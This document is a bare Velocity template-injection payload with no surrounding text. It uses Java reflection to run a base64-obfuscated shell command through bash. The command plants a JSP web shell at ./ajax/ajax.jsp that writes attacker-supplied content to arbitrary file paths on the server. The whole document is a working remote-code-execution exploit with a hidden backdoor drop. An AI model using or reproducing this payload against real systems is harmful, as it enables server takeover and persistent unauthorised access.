#set($e="e")
$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("{echo,ZWNobyAnPCVpZihyZXF1ZXN0LmdldFBhcmFtZXRlcigiZiIpIT1udWxsKShuZXcgamF2YS5pby5GaWxlT3V0cHV0U3RyZWFtKGFwcGxpY2F0aW9uLmdldFJlYWxQYXRoKCIvIikrcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImYiKSkpLndyaXRlKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJ0IikuZ2V0Qnl0ZXMoKSk7JT4nID4uL2FqYXgvYWpheC5qc3A=}|{base64,-d}|{bash,-i}")
